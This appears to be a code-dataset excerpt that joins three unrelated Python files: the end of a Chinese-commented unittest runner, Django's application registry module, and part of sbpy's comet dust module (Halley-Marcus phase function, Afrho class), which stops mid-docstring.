print('this is teardown')
# 关闭浏览器可以用此方法
@classmethod
def tearDownClass(self):
print('this is teardownclass')
def suite():
suite = unittest.TestSuite()
suite.addTest(CnodeTest('test_01register'))
suite.addTest(CnodeTest('test_02login'))
return suite
if __name__ == '__main__':
suite=suite()
# 测试用例执行器
runner = HTMLReport.TestRunner(report_file_name='test', # 报告文件名,默认“test”
output_path='report', # 保存文件夹名,默认“report”
verbosity=2, # 控制台输出详细程度,默认 2
title='测试报告', # 报告标题,默认“测试报告”
description='无测试描述', # 报告描述,默认“无测试描述”
thread_count=1, # 并发线程数量(无序执行测试),默认数量 1
# 是否按照套件添加(addTests)顺序执行,
sequential_execution=True
# 会等待一个addTests执行完成,再执行下一个,默认 False
)
# 执行测试用例套件
runner.run(suite)
| StarcoderdataPython |
4824210 | <gh_stars>1-10
import sys
import threading
import warnings
from collections import Counter, OrderedDict, defaultdict
from functools import partial
from django.core.exceptions import AppRegistryNotReady, ImproperlyConfigured
from django.utils import lru_cache
from .config import AppConfig
class Apps(object):
"""
A registry that stores the configuration of installed applications.
It also keeps track of models eg. to provide reverse-relations.
"""
def __init__(self, installed_apps=()):
# installed_apps is set to None when creating the master registry
# because it cannot be populated at that point. Other registries must
# provide a list of installed apps and are populated immediately.
if installed_apps is None and hasattr(sys.modules[__name__], 'apps'):
raise RuntimeError("You must supply an installed_apps argument.")
# Mapping of app labels => model names => model classes. Every time a
# model is imported, ModelBase.__new__ calls apps.register_model which
# creates an entry in all_models. All imported models are registered,
# regardless of whether they're defined in an installed application
# and whether the registry has been populated. Since it isn't possible
# to reimport a module safely (it could reexecute initialization code)
# all_models is never overridden or reset.
self.all_models = defaultdict(OrderedDict)
# Mapping of labels to AppConfig instances for installed apps.
self.app_configs = OrderedDict()
# Stack of app_configs. Used to store the current state in
# set_available_apps and set_installed_apps.
self.stored_app_configs = []
# Whether the registry is populated.
self.apps_ready = self.models_ready = self.ready = False
# Lock for thread-safe population.
self._lock = threading.Lock()
# Maps ("app_label", "modelname") tuples to lists of functions to be
# called when the corresponding model is ready. Used by this class's
# `lazy_model_operation()` and `do_pending_operations()` methods.
self._pending_operations = defaultdict(list)
# Populate apps and models, unless it's the master registry.
if installed_apps is not None:
self.populate(installed_apps)
def populate(self, installed_apps=None):
"""
Loads application configurations and models.
This method imports each application module and then each model module.
It is thread safe and idempotent, but not reentrant.
"""
if self.ready:
return
# populate() might be called by two threads in parallel on servers
# that create threads before initializing the WSGI callable.
with self._lock:
if self.ready:
return
# app_config should be pristine, otherwise the code below won't
# guarantee that the order matches the order in INSTALLED_APPS.
if self.app_configs:
raise RuntimeError("populate() isn't reentrant")
# Load app configs and app modules.
for entry in installed_apps:
if isinstance(entry, AppConfig):
app_config = entry
else:
app_config = AppConfig.create(entry)
if app_config.label in self.app_configs:
raise ImproperlyConfigured(
"Application labels aren't unique, "
"duplicates: %s" % app_config.label)
self.app_configs[app_config.label] = app_config
# Check for duplicate app names.
counts = Counter(
app_config.name for app_config in self.app_configs.values())
duplicates = [
name for name, count in counts.most_common() if count > 1]
if duplicates:
raise ImproperlyConfigured(
"Application names aren't unique, "
"duplicates: %s" % ", ".join(duplicates))
self.apps_ready = True
# Load models.
for app_config in self.app_configs.values():
all_models = self.all_models[app_config.label]
app_config.import_models(all_models)
self.clear_cache()
self.models_ready = True
for app_config in self.get_app_configs():
app_config.ready()
self.ready = True
def check_apps_ready(self):
"""
Raises an exception if all apps haven't been imported yet.
"""
if not self.apps_ready:
raise AppRegistryNotReady("Apps aren't loaded yet.")
def check_models_ready(self):
"""
Raises an exception if all models haven't been imported yet.
"""
if not self.models_ready:
raise AppRegistryNotReady("Models aren't loaded yet.")
def get_app_configs(self):
"""
Imports applications and returns an iterable of app configs.
"""
self.check_apps_ready()
return self.app_configs.values()
def get_app_config(self, app_label):
"""
Imports applications and returns an app config for the given label.
Raises LookupError if no application exists with this label.
"""
self.check_apps_ready()
try:
return self.app_configs[app_label]
except KeyError:
message = "No installed app with label '%s'." % app_label
for app_config in self.get_app_configs():
if app_config.name == app_label:
message += " Did you mean '%s'?" % app_config.label
break
raise LookupError(message)
# This method is performance-critical at least for Django's test suite.
@lru_cache.lru_cache(maxsize=None)
def get_models(self, include_auto_created=False, include_swapped=False):
"""
Returns a list of all installed models.
By default, the following models aren't included:
- auto-created models for many-to-many relations without
an explicit intermediate table,
- models created to satisfy deferred attribute queries,
- models that have been swapped out.
Set the corresponding keyword argument to True to include such models.
"""
self.check_models_ready()
result = []
for app_config in self.app_configs.values():
result.extend(list(app_config.get_models(include_auto_created, include_swapped)))
return result
def get_model(self, app_label, model_name=None):
"""
Returns the model matching the given app_label and model_name.
As a shortcut, this function also accepts a single argument in the
form <app_label>.<model_name>.
model_name is case-insensitive.
Raises LookupError if no application exists with this label, or no
model exists with this name in the application. Raises ValueError if
called with a single argument that doesn't contain exactly one dot.
"""
self.check_models_ready()
if model_name is None:
app_label, model_name = app_label.split('.')
return self.get_app_config(app_label).get_model(model_name.lower())
def register_model(self, app_label, model):
# Since this method is called when models are imported, it cannot
# perform imports because of the risk of import loops. It mustn't
# call get_app_config().
model_name = model._meta.model_name
app_models = self.all_models[app_label]
if model_name in app_models:
if (model.__name__ == app_models[model_name].__name__ and
model.__module__ == app_models[model_name].__module__):
warnings.warn(
"Model '%s.%s' was already registered. "
"Reloading models is not advised as it can lead to inconsistencies, "
"most notably with related models." % (app_label, model_name),
RuntimeWarning, stacklevel=2)
else:
raise RuntimeError(
"Conflicting '%s' models in application '%s': %s and %s." %
(model_name, app_label, app_models[model_name], model))
app_models[model_name] = model
self.do_pending_operations(model)
self.clear_cache()
def is_installed(self, app_name):
"""
Checks whether an application with this name exists in the registry.
app_name is the full name of the app eg. 'django.contrib.admin'.
"""
self.check_apps_ready()
return any(ac.name == app_name for ac in self.app_configs.values())
def get_containing_app_config(self, object_name):
"""
Look for an app config containing a given object.
object_name is the dotted Python path to the object.
Returns the app config for the inner application in case of nesting.
Returns None if the object isn't in any registered app config.
"""
self.check_apps_ready()
candidates = []
for app_config in self.app_configs.values():
if object_name.startswith(app_config.name):
subpath = object_name[len(app_config.name):]
if subpath == '' or subpath[0] == '.':
candidates.append(app_config)
if candidates:
return sorted(candidates, key=lambda ac: -len(ac.name))[0]
def get_registered_model(self, app_label, model_name):
"""
Similar to get_model(), but doesn't require that an app exists with
the given app_label.
It's safe to call this method at import time, even while the registry
is being populated.
"""
model = self.all_models[app_label].get(model_name.lower())
if model is None:
raise LookupError(
"Model '%s.%s' not registered." % (app_label, model_name))
return model
@lru_cache.lru_cache(maxsize=None)
def get_swappable_settings_name(self, to_string):
"""
For a given model string (e.g. "auth.User"), return the name of the
corresponding settings name if it refers to a swappable model. If the
referred model is not swappable, return None.
This method is decorated with lru_cache because it's performance
critical when it comes to migrations. Since the swappable settings don't
change after Django has loaded the settings, there is no reason to get
the respective settings attribute over and over again.
"""
for model in self.get_models(include_swapped=True):
swapped = model._meta.swapped
# Is this model swapped out for the model given by to_string?
if swapped and swapped == to_string:
return model._meta.swappable
# Is this model swappable and the one given by to_string?
if model._meta.swappable and model._meta.label == to_string:
return model._meta.swappable
return None
def set_available_apps(self, available):
"""
Restricts the set of installed apps used by get_app_config[s].
available must be an iterable of application names.
set_available_apps() must be balanced with unset_available_apps().
Primarily used for performance optimization in TransactionTestCase.
This method is safe is the sense that it doesn't trigger any imports.
"""
available = set(available)
installed = set(app_config.name for app_config in self.get_app_configs())
if not available.issubset(installed):
raise ValueError(
"Available apps isn't a subset of installed apps, extra apps: %s"
% ", ".join(available - installed)
)
self.stored_app_configs.append(self.app_configs)
self.app_configs = OrderedDict(
(label, app_config)
for label, app_config in self.app_configs.items()
if app_config.name in available)
self.clear_cache()
def unset_available_apps(self):
"""
Cancels a previous call to set_available_apps().
"""
self.app_configs = self.stored_app_configs.pop()
self.clear_cache()
def set_installed_apps(self, installed):
"""
Enables a different set of installed apps for get_app_config[s].
installed must be an iterable in the same format as INSTALLED_APPS.
set_installed_apps() must be balanced with unset_installed_apps(),
even if it exits with an exception.
Primarily used as a receiver of the setting_changed signal in tests.
This method may trigger new imports, which may add new models to the
registry of all imported models. They will stay in the registry even
after unset_installed_apps(). Since it isn't possible to replay
imports safely (eg. that could lead to registering listeners twice),
models are registered when they're imported and never removed.
"""
if not self.ready:
raise AppRegistryNotReady("App registry isn't ready yet.")
self.stored_app_configs.append(self.app_configs)
self.app_configs = OrderedDict()
self.apps_ready = self.models_ready = self.ready = False
self.clear_cache()
self.populate(installed)
def unset_installed_apps(self):
"""
Cancels a previous call to set_installed_apps().
"""
self.app_configs = self.stored_app_configs.pop()
self.apps_ready = self.models_ready = self.ready = True
self.clear_cache()
def clear_cache(self):
"""
Clears all internal caches, for methods that alter the app registry.
This is mostly used in tests.
"""
# Call expire cache on each model. This will purge
# the relation tree and the fields cache.
self.get_models.cache_clear()
if self.ready:
# Circumvent self.get_models() to prevent that the cache is refilled.
# This particularly prevents that an empty value is cached while cloning.
for app_config in self.app_configs.values():
for model in app_config.get_models(include_auto_created=True):
model._meta._expire_cache()
def lazy_model_operation(self, function, *model_keys):
"""
Take a function and a number of ("app_label", "modelname") tuples, and
when all the corresponding models have been imported and registered,
call the function with the model classes as its arguments.
The function passed to this method must accept exactly n models as
arguments, where n=len(model_keys).
"""
# Base case: no arguments, just execute the function.
if not model_keys:
function()
# Recursive case: take the head of model_keys, wait for the
# corresponding model class to be imported and registered, then apply
# that argument to the supplied function. Pass the resulting partial
# to lazy_model_operation() along with the remaining model args and
# repeat until all models are loaded and all arguments are applied.
else:
next_model, more_models = model_keys[0], model_keys[1:]
# This will be executed after the class corresponding to next_model
# has been imported and registered. The `func` attribute provides
# duck-type compatibility with partials.
def apply_next_model(model):
next_function = partial(apply_next_model.func, model)
self.lazy_model_operation(next_function, *more_models)
apply_next_model.func = function
# If the model has already been imported and registered, partially
# apply it to the function now. If not, add it to the list of
# pending operations for the model, where it will be executed with
# the model class as its sole argument once the model is ready.
try:
model_class = self.get_registered_model(*next_model)
except LookupError:
self._pending_operations[next_model].append(apply_next_model)
else:
apply_next_model(model_class)
def do_pending_operations(self, model):
"""
Take a newly-prepared model and pass it to each function waiting for
it. This is called at the very end of `Apps.register_model()`.
"""
key = model._meta.app_label, model._meta.model_name
for function in self._pending_operations.pop(key, []):
function(model)
apps = Apps(installed_apps=None)
| StarcoderdataPython |
6496869 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
==========================
SBPy Activity: Dust Module
==========================
All things dust coma related.
Functions
---------
phase_HalleyMarcus - Halley-Marcus composite dust phase function.
Classes
-------
Afrho - Coma dust quantity of A'Hearn et al. (1984).
Efrho - Thermal emission equivalent of Afrho.
Syndynes - Dust dynamical model for zero-ejection velocities.
"""
import numpy as np
import astropy.units as u
__all__ = [
'phase_HalleyMarcus',
'Afrho',
'Efrho',
'Syndynes'
]
def phase_HalleyMarcus(phase):
"""
Halley-Marcus composite dust phase function.
Uses `~scipy.interpolate` for spline interpolation, otherwise uses
linear interpolation from `~numpy.interp`.
Parameters
----------
phase : `~astropy.units.Quantity`
Phase angle.
Returns
-------
Phi : float or `~np.ndarray`
Notes
-----
The Halley-Marcus phase function was first used by Schleicher and
Bair (2011), but only described in detail by Schleicher and Marcus
(May 2010) online at:
http://asteroid.lowell.edu/comet/dustphase.html
"To distinguish this curve from others, we designate this as
the HM phase function, for the sources of the two components:
Halley and Marcus, where the Halley curve for smaller phase
angles comes from our previous work (Schleicher et al. 1998)
while Joe Marcus has fit a Henyey-Greenstein function to a
variety of mid- and large-phase angle data sets (Marcus 2007);
see here for details. Note that we do not consider our
composite curve to be a definitive result, but rather
appropriate for performing first-order adjustments to dust
measurements for changing phase angle."
References
----------
Schleicher & Bair 2011, AJ 141, 177.
Schleicher, Millis, & Birch 1998, Icarus 132, 397-417.
Marcus 2007, International Comets Quarterly 29, 39-66.
Examples
--------
>>> from sbpy.activity import phase_HalleyMarcus
>>> import astropy.units as u
>>> phase_HalleyMarcus(0 * u.deg) # doctest: +FLOAT_CMP
1.0
>>> phase_HalleyMarcus(15 * u.deg) # doctest: +FLOAT_CMP
5.8720e-01
"""
from .. import bib
bib.register(
'activity.dust.phase_HalleyMarcus',
{
'Halley phase function': '1998Icar..132..397S',
'Marcus phase function': '2007ICQ....29...39M'
}
)
th = np.arange(181)
ph = np.array(
[1.0000e+00, 9.5960e-01, 9.2170e-01, 8.8590e-01,
8.5220e-01, 8.2050e-01, 7.9060e-01, 7.6240e-01,
7.3580e-01, 7.1070e-01, 6.8710e-01, 6.6470e-01,
6.4360e-01, 6.2370e-01, 6.0490e-01, 5.8720e-01,
5.7040e-01, 5.5460e-01, 5.3960e-01, 5.2550e-01,
5.1220e-01, 4.9960e-01, 4.8770e-01, 4.7650e-01,
4.6590e-01, 4.5590e-01, 4.4650e-01, 4.3770e-01,
4.2930e-01, 4.2150e-01, 4.1420e-01, 4.0730e-01,
4.0090e-01, 3.9490e-01, 3.8930e-01, 3.8400e-01,
3.7920e-01, 3.7470e-01, 3.7060e-01, 3.6680e-01,
3.6340e-01, 3.6030e-01, 3.5750e-01, 3.5400e-01,
3.5090e-01, 3.4820e-01, 3.4580e-01, 3.4380e-01,
3.4210e-01, 3.4070e-01, 3.3970e-01, 3.3890e-01,
3.3850e-01, 3.3830e-01, 3.3850e-01, 3.3890e-01,
3.3960e-01, 3.4050e-01, 3.4180e-01, 3.4320e-01,
3.4500e-01, 3.4700e-01, 3.4930e-01, 3.5180e-01,
3.5460e-01, 3.5760e-01, 3.6090e-01, 3.6450e-01,
3.6830e-01, 3.7240e-01, 3.7680e-01, 3.8150e-01,
3.8650e-01, 3.9170e-01, 3.9730e-01, 4.0320e-01,
4.0940e-01, 4.1590e-01, 4.2280e-01, 4.3000e-01,
4.3760e-01, 4.4560e-01, 4.5400e-01, 4.6270e-01,
4.7200e-01, 4.8160e-01, 4.9180e-01, 5.0240e-01,
5.1360e-01, 5.2530e-01, 5.3750e-01, 5.5040e-01,
5.6380e-01, 5.7800e-01, 5.9280e-01, 6.0840e-01,
6.2470e-01, 6.4190e-01, 6.5990e-01, 6.7880e-01,
6.9870e-01, 7.1960e-01, 7.4160e-01, 7.6480e-01,
7.8920e-01, 8.1490e-01, 8.4200e-01, 8.7060e-01,
9.0080e-01, 9.3270e-01, 9.6640e-01, 1.0021e+00,
1.0399e+00, 1.0799e+00, 1.1223e+00, 1.1673e+00,
1.2151e+00, 1.2659e+00, 1.3200e+00, 1.3776e+00,
1.4389e+00, 1.5045e+00, 1.5744e+00, 1.6493e+00,
1.7294e+00, 1.8153e+00, 1.9075e+00, 2.0066e+00,
2.1132e+00, 2.2281e+00, 2.3521e+00, 2.4861e+00,
2.6312e+00, 2.7884e+00, 2.9592e+00, 3.1450e+00,
3.3474e+00, 3.5685e+00, 3.8104e+00, 4.0755e+00,
4.3669e+00, 4.6877e+00, 5.0418e+00, 5.4336e+00,
5.8682e+00, 6.3518e+00, 6.8912e+00, 7.4948e+00,
8.1724e+00, 8.9355e+00, 9.7981e+00, 1.0777e+01,
1.1891e+01, 1.3166e+01, 1.4631e+01, 1.6322e+01,
1.8283e+01, 2.0570e+01, 2.3252e+01, 2.6418e+01,
3.0177e+01, 3.4672e+01, 4.0086e+01, 4.6659e+01,
5.4704e+01, 6.4637e+01, 7.7015e+01, 9.2587e+01,
1.1237e+02, 1.3775e+02, 1.7060e+02, 2.1348e+02,
2.6973e+02, 3.4359e+02, 4.3989e+02, 5.6292e+02,
7.1363e+02, 8.8448e+02, 1.0533e+03, 1.1822e+03,
1.2312e+03])
try:
from scipy.interpolate import splrep, splev
Phi = splev(np.abs(phase), splrep(th, ph))
except ImportError as e:
from astropy.utils.exceptions import AstropyWarning
from warnings import warn
warn(AstropyWarning('scipy is not present, using linear interpolation.'))
Phi = np.interp(np.abs(phase), th, ph)
if np.iterable(phase):
Phi = np.array(Phi).reshape(np.shape(phase))
else:
Phi = float(Phi)
return Phi
class Afrho(u.SpecificTypeQuantity):
"""
Coma dust quantity for scattered light.
``Afrho`` objects behave like astropy `~astropy.units.Quantity`
objects with units of length.
Parameters
----------
value : number, astropy `~astropy.units.Quantity`
The value(s).
unit : string, astropy `~Unit`
The unit of the input value, if ``value`` is a number. If a
string, it must be parseable by :mod:`~astropy.units` package.
dtype : `~numpy.dtype`, optional
See `~astropy.units.Quantity`.
copy : bool, optional
See `~astropy.units.Quantity`.
Notes
-----
Afρ is the product of dust albedo, dust filling factor, and
circular aperture radius. It is nominally a constant for a
steady-state coma in free expansion. See A'Hearn et al. (1984)
for details.
References
----------
A'Hearn et al. 1984, AJ 89, 579-591.
Examples
--------
>>> from sbpy.activity import Afrho
>>> import astropy.units as u
>>> print(Afrho(1000 * u.cm))
1000.0 cm
"""
_equivalent_unit = u.meter
_include_easy_conversion_members = True
def __new__(cls, value, unit=None, dtype=None, copy=None):
return super().__new__(cls, value, unit=unit, dtype=dtype, copy=copy)
@classmethod
def from_fluxd(cls, wave_or_freq, fluxd, aper, eph, phasecor=False,
Phi=None, S=None, unit=None):
"""
Initialize from flux density.
Parameters
----------
wave_or_freq : `~astropy.units.Quantity`
Wavelengths or frequencies of the observation.
fluxd : `~astropy.units.Quantity`
Flux density per unit wavelength or frequency.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an `~sbpy.activity.Aperture`.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as a `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if ``phasecor`` is enabled.
phasecor : bool, optional
Scale the result by the phase function ``Phi`` to 0°
phase.
Phi : callable, optional
Phase function, see `~Afrho.to_phase` for details.
S : `~astropy.units.Quantity`, optional
Solar flux density at 1 au and ``wave``. If ``None``,
then the default solar spectrum will be used via
`~sbpy.spectroscopy.sun.default_sun`.
Examples
--------
>>> from sbpy.activity import Afrho
>>> import astropy.units as u
>>> fluxd = 6.730018324465526e-14 * u.W / u.m**2 / u.um
>>> aper = 1 * u.arcsec
>>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
>>> S = 1869 * u.W / u.m**2 / u.um
>>> afrho = Afrho.from_fluxd(None, fluxd, aper, eph=eph, S=S)
>>> afrho.cm # doctest: +FLOAT_CMP
999.9999999999999
"""
fluxd1cm = Afrho(1 * u.cm).fluxd(wave_or_freq, aper, eph=eph, S=S,
unit=fluxd.unit)
afrho = Afrho((fluxd / fluxd1cm).decompose() * u.cm)
if phasecor:
afrho = afrho.to_phase(0 * u.deg, eph['phase'])
return afrho
@classmethod
def from_filt(cls, bandpass, fluxd, aper, eph, **kwargs):
"""Initialize from filter bandpass and flux density.
Parameters
----------
bandpass : string or `~synphot.SpectralElement`
The bandpass for ``fluxd`` as the name of a filter, or a
transmission spectrum as a `~synphot.SpectralElement`.
See :ref:`sbpy_spectral_standards` for calibration notes.
fluxd: `~astropy.units.Quantity`
Flux density per unit wavelength or frequency.
aper: `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius(length
or angular units), or as an `~sbpy.activity.Aperture`.
eph: dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if ``phasecor`` is enabled.
**kwargs
Additional `~Afrho.from_fluxd` keywords, except ``S``.
Examples
--------
Using `synphot`'s built-in I-band filter:
>>> import astropy.units as u
>>> from sbpy.activity import Afrho
>>> bp = 'cousins_r'
>>> fluxd = 5.667958103624571e-14 * u.W / u.m**2 / u.um
>>> aper = 1 * u.arcsec
>>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
>>> afrho = Afrho.from_filt(bp, fluxd, aper, eph)
... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> afrho.cm # doctest: +FLOAT_CMP +REMOTE_DATA
1000.0
Using Spitzer's IRAC 3.6-μm filter (online):
>>> from synphot import SpectralElement
>>> fluxd = 5.286867353823682e-16 * u.W / u.m**2 / u.um
>>> bp = SpectralElement.from_file('http://irsa.ipac.caltech.edu/data/SPITZER/docs/irac/calibrationfiles/spectralresponse/080924ch1trans_full.txt', wave_unit='um')
... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> afrho = Afrho.from_filt(bp, fluxd, aper, eph)
... # doctest: +REMOTE_DATA
>>> afrho.cm # doctest: +REMOTE_DATA
1000.0
Notes
-----
Filter names can be found in the `~synphot` `documentation
# synphot-predefined-filter>`_.
<http: // synphot.readthedocs.io/en/stable/synphot/bandpass.html
"""
from ..spectroscopy.sun import default_sun
sun = default_sun.get()
wave, S = sun.filt(bandpass, unit=fluxd.unit)
return cls.from_fluxd(None, fluxd, aper, eph, S=S, **kwargs)
@classmethod
def from_mag(cls, mag, unit, aper, eph, bandpass=None, m_sun=None,
verbose=True, **kwargs):
"""Initialize from filter and magnitude.
Parameters
----------
mag : float
Apparent magntiude.
unit: string
Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
Ignored if ``m_sun`` is defined.
aper: `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius(length
or angular units), or as an `~sbpy.activity.Aperture`.
eph: dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if ``phasecor`` is enabled.
bandpass : string or `~synphot.SpectralElement`
Compute the apparent magnitude of the Sun though this
bandpass: the name of a `~synphot` filter, or a
transmission spectrum as a `~synphot.SpectralElement`.
Ignored if ``m_sun`` is defined. See
:ref:`sbpy_spectral_standards` for calibration notes.
m_sun : float
Use this value for the apparent magnitude of the Sun
rather than computing it using ``bandpass``. ``m_sun`` is
assumed to be in the same magnitude system as ``mag``.
verbose : bool, optional
If ``True``, print the computed solar magnitude.
**kwargs
Additional keyword arguments for `~Afrho.from_fluxd`,
except ``S``.
Examples
--------
>>> import astropy.units as u
>>> from sbpy.activity import Afrho
>>> m = 8.49
>>> aper = 10000 * u.km
>>> eph = {'rh': 1.45 * u.au,
... 'delta': 0.49 * u.au,
... 'phase': 17.8 * u.deg}
>>> afrho = Afrho.from_mag(m, 'vegamag', aper, eph,
... bandpass='cousins_i', phasecor=True)
... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> afrho.value # doctest: +REMOTE_DATA +FLOAT_CMP
3423.6675739077887
Notes
-----
Filter names can be found in the `~synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
A discussion of magnitude zero points can be found in the
`~synphot` `documentation
<http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
"""
from ..spectroscopy.sun import default_sun
from ..spectroscopy.vega import default_vega
if m_sun is None and bandpass is None:
raise ValueError('One of `bandpass` or `m_sun` must be provided.')
if m_sun is None:
sun = default_sun.get()
if unit.lower() == 'vegamag':
fluxd_sun = sun.filt(bandpass, unit='W/(m2 um)')[1]
vega = default_vega.get()
fluxd_vega = vega.filt(bandpass, unit='W/(m2 um)')[1]
m_sun = -2.5 * np.log10(fluxd_sun / fluxd_vega).value
elif unit.lower() == 'abmag':
fluxd_sun = sun.filt(bandpass, unit='erg/(s cm2 Hz)')[1]
m_sun = -2.5 * np.log10(fluxd_sun.value) - 48.60
elif unit.lower() == 'stmag':
fluxd_sun = sun.filt(bandpass, unit='erg/(s cm2 AA)')[1]
m_sun = -2.5 * np.log10(fluxd_sun.value) - 21.10
else:
raise ValueError(
'Magnitude system must be one of vegamag, abmag, or stmag.')
if verbose:
print('Using m_sun = {:.4f}'.format(m_sun))
fluxd = u.Quantity(10**(-0.4 * (mag - m_sun)), 'W/(m2 um)')
S = u.Quantity(1, 'W/(m2 um)') # fluxd already relative to the Sun
return cls.from_fluxd(None, fluxd, aper, eph, S=S, **kwargs)
def fluxd(self, wave_or_freq, aper, eph, phasecor=False, Phi=None,
S=None, unit='W/(m2 um)'):
"""
Coma flux density.
Assumes the small angle approximation.
Parameters
----------
wave_or_freq : `~astropy.units.Quantity`
Wavelengths or frequencies of the observation. Ignored if
`S` is provided.
aper: `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius(length
or angular units), or as an sbpy `~sbpy.activity.Aperture`.
eph: dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if ``phasecor`` is enabled.
phasecor: bool, optional
Scale the result by the phase function ``Phi``, assuming
``Afrho`` is quoted for 0° phase.
Phi : callable, optional
Phase function, see ``to_phase`` for details.
S : `~astropy.units.Quantity`, optional
Solar flux density at 1 au and ``wave``. If ``None``,
then the default solar spectrum will be used via
`~sbpy.spectroscopy.sun.default_sun`.
unit : string or `~astropy.units.Unit`, optional
The flux density unit for the output, ignored if ``S`` is
provided.
Returns
-------
fluxd : `~astropy.units.Quantity`
Spectral flux density.
Examples
--------
>>> from sbpy.activity import Afrho
>>> import astropy.units as u
>>> afrho = Afrho(1000, 'cm')
>>> aper = 1 * u.arcsec
>>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
>>> S = 1869 * u.W / u.m**2 / u.um
>>> fluxd = afrho.fluxd(None, aper, eph=eph, S=S)
>>> fluxd.value # doctest: +FLOAT_CMP
6.730018324465526e-14
"""
from .core import Aperture, rho_as_length
from ..spectroscopy.sun import default_sun
from .. import bib
bib.register('activity.dust.Afrho.fluxd', {
'model': '1984AJ.....89..579A'})
# check aperture radius
if isinstance(aper, Aperture):
rho = aper.coma_equivalent_radius()
else:
rho = aper
rho = rho_as_length(rho, eph)
# check solar flux density
if S is None:
sun = default_sun.get()
S = sun(wave_or_freq, unit=unit)
else:
if not (S.unit.is_equivalent(u.W / u.m**2 / u.um)
or S.unit.is_equivalent(u.W / u.m**2 / u.Hz)):
raise ValueError(
'S must have units of spectral flux density, '
'e.g., W/m2/μm or W/m2/Hz')
if phasecor:
afrho = self.to_phase(eph['phase'], 0 * u.deg)
else:
afrho = self
# compute
fluxd = afrho * rho * S / 4 / eph['delta']**2 * u.au**2 / eph['rh']**2
return fluxd.to(S.unit)
def filt(self, bandpass, aper, eph, unit=None, **kwargs):
"""Coma flux density through a filter.
Parameters
----------
bandpass : string or `~synphot.SpectralElement`
Compute the coma flux density through this bandpass: the
name of a `~synphot` filter, or a transmission spectrum as
a `~synphot.SpectralElement`. See
:ref:`sbpy_spectral_standards` for calibration notes.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if `phasecor` is enabled.
unit : string or `~astropy.units.Unit`, optional
The spectral unit for the output.
**kwargs
Any other `Afrho.fluxd` keyword argument except ``S``.
Examples
--------
Using `synphot`'s built-in I-band filter:
>>> import astropy.units as u
>>> from sbpy.activity import Afrho
>>> bp = 'cousins_r'
>>> afrho = Afrho(1000, 'cm')
>>> aper = 1 * u.arcsec
>>> eph = dict(rh=1.5 * u.au, delta=1.0 * u.au)
>>> unit = 'W/(m2 um)'
>>> fluxd = afrho.filt(bp, aper, eph, unit=unit)
... # doctest: +FLOAT_CMP +REMOTE_DATA
>>> fluxd.value # doctest: +FLOAT_CMP +REMOTE_DATA
5.66795810362457e-14
Using Spitzer's IRAC 3.6-μm filter (online):
>>> from synphot import SpectralElement
>>> bp = SpectralElement.from_file('http://irsa.ipac.caltech.edu/'
... 'data/SPITZER/docs/irac/calibrationfiles/spectralresponse/'
... '080924ch1trans_full.txt', wave_unit='um')
... # doctest: +REMOTE_DATA
>>> fluxd = afrho.filt(bp, aper, eph, unit=unit)
... # doctest: +REMOTE_DATA
>>> fluxd.value # doctest: +REMOTE_DATA
5.286867353823682e-16
Returns
-------
fluxd : `~astropy.units.Quantity`
Spectral flux density.
Notes
-----
Filter names can be found in the `synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
"""
from ..spectroscopy.sun import default_sun
sun = default_sun.get()
wave, S = sun.filt(bandpass, unit=unit)
return self.fluxd(None, aper, eph, S=S, unit=unit, **kwargs)
def mag(self, unit, aper, eph, bandpass=None, m_sun=None, verbose=True,
**kwargs):
"""Coma apparent magnitude.
Parameters
----------
unit : string
Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
Ignored if ``m_sun`` is provided. See
:ref:`sbpy_spectral_standards` for calibration notes.
aper : `~astropy.units.Quantity` or `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`, optional
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``.
bandpass : string or `~synphot.SpectralElement`, optional
Compute the apparent mangitude of the Sun in this
bandpass: the name of a `~synphot` filter, or a
transmission spectrum as a `~synphot.SpectralElement`.
Ignored if ``m_sun`` is provided. See
:ref:`sbpy_spectral_standards` for calibration notes.
m_sun : float, optional
Use this value for the apparent magnitude of the Sun.
verbose : bool, optional
If ``True``, print the computed solar magnitude.
**kwargs :
Any other `Afrho.fluxd` keyword argument except ``S``.
Returns
-------
mag : float
Examples
--------
Reverse of Afrho.from_mag test
>>> import astropy.units as u
